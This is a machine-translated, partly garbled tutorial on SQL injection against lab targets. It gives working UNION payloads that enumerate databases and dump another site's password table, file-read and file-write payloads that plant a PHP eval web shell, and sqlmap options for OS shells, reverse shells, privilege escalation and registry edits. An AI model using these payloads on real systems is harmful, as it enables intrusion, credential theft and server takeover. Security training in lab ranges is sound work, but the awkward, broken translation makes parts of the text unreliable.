One, cross-database injection
For example, there are two sites under the same IP corresponding to sites A and B. If site A has high-privilege injection (root), it will cause data leakage of site B or other web applications in the same database.
local A site: http://sqli-labs-master:100/Less-1/ corresponding to the database authority root
local B site: http://127.0.0.1/xinyuan/index.php corresponding to the database authority ordinary user
then At this point, we first manually inject the permission to view the database on the A website, and
id=-1' union select 1,2,user() --+find that it is root permission
Check all the databases,
-1' union select 1,group_concat(SCHEMA_NAME),3 from information_schema.schemata--+
here you can find the database php_wish of website B, as well as other websites. I have introduced the column shcema_name under the information_schema.schemata table. The table that stores the database name information.
Well, we then get all the table names under the B website database, and
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='php_wish'--+find that there is only one table name wish,
then get all the column names under the wish table name, and
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='wish' and table_schema='php_wish'--+
finally get the data ,
-1' union select 1,id,password from php_wish.wish--+Here pay attention to cross-database injection, you must add a point to specify the database in front of the table, because the current database is security, and the default query for not specifying the database is that the table under the security database is in
front of manual injection, so what is the difference between using the tool sqlmap and manual? If the target site is a high-privilege injection, such as --tables, then the tool will first obtain all databases under high-privilege and then the table name by default. Then how does the tool judge high-privilege, different databases correspond to different built-in functions for judgment, just need --is-dba can judge whether it is high authority
Two, file read and write
When you support high permissions, you can read and write files, fetch some sensitive files, or write a word of Trojan horse
1' union select 1,load_file('d:/test.txt'),3--+
Write a sentence of Trojan Horse
id=-1' union select 1,'<?php eval($_POST[cmd]);?>',3 into outfile 'D:/phpstudy_pro/WWW/xinyuan/x.php' --+
Then obtain the application path of WEB: description file phpinfo, error display, specific source code burst, read middleware configuration, blasting, etc.
Three, injection permissions, command execution
So here is the
Mozhe shooting range of the Sql Server database. We use tools to make a comparison. Use two tools: 1. Pangolin, 2. Havij
1. Compare the operational aspects of Sql Server or other databases.
2. The tool can be operated to automatically identify attacks.
Then you can do the following operations, we just choose a few operations
Havij's operation interface is as follows,
so different databases correspond to different operations, and then some operations of Kangkang SQLMAP
--Current-user current user
--File-read read from the server
–File-write writes from local to the local file, followed by the file to be written remotely
–sql-shell executes the sql command terminal
–os-shell executes the shell terminal.
We follow up and we can see that tmpbvizc.php and tmpucvgu have been uploaded. php two files,
then there are the following functions and do not do the operation
--os-cmd=ver 自定义命令 --os-cmd=OSCMD//执行操作系统命令 --os-shell //反弹一个osshell --os-pwn //pwn，反弹msf下的shell或者vnc --os-smbrelay //反弹msf下的shell或者vnc --os-bof //存储过程缓存溢出 --priv-esc //数据库提权 --reg-read --reg-add --reg-del --reg-key --reg-value --reg-data --reg-type